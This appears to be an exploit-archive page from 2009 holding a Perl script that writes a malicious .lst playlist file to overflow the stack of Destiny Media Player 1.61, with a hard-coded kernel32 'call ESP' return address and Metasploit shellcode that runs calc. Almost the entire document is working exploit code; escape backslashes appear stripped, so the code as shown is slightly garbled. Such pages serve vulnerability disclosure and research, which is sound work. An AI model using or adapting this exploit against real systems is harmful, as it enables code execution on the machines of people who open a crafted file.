Destiny Media Player 1.61 (lst File) Local Buffer Overflow Exploit #3

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Destiny Media Player 1.61 (lst File) Local Buffer Overflow Exploit #3
# Published : 2009-01-04
# Author : Houssamix
# Previous Title : Destiny Media Player 1.61 (lst File) Local Buffer Overflow Exploit #2
# Next Title : Destiny Media Player 1.61 (lst File) Local Buffer Overflow Exploit #4

#!/usr/bin/perl -w

# exploit coded by Houssamix
# poc found by aBo MoHaMeD 


print "===================================================================== n";
print "Author : Houssamix  n";
print "===================================================================== n";
print "Destiny Media Player 1.61 (.lst File) Local Stack Overflow Exploit n";
print "===================================================================== nn";


my $overflow = "x41" x 2052;

my $ret = "x5Dx38x82x7C"; #call ESP from kernel32.dll       0x7C82385D

my $nop = "x90" x 1;

# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
my $shellcode =
"x31xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x08".
"x99x23x82x83xebxfcxe2xf4xf4x71x67x82x08x99xa8xc7".
"x34x12x5fx87x70x98xccx09x47x81xa8xddx28x98xc8xcb".
"x83xadxa8x83xe6xa8xe3x1bxa4x1dxe3xf6x0fx58xe9x8f".
"x09x5bxc8x76x33xcdx07x86x7dx7cxa8xddx2cx98xc8xe4".
"x83x95x68x09x57x85x22x69x83x85xa8x83xe3x10x7fxa6".
"x0cx5ax12x42x6cx12x63xb2x8dx59x5bx8ex83xd9x2fx09".
"x78x85x8ex09x60x91xc8x8bx83x19x93x82x08x99xa8xea".
"x34xc6x12x74x68xcfxaax7ax8bx59x58xd2x60x69xa9x86".
"x57xf1xbbx7cx82x97x74x7dxefxfax42xeex6bx99x23x82";


my $file="hsmx.lst";

$exploit = $overflow.$ret.$nop.$shellcode;

open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $exploit ;


close($FILE);
print "$file has been created n";

# www.Syue.com [2009-01-04]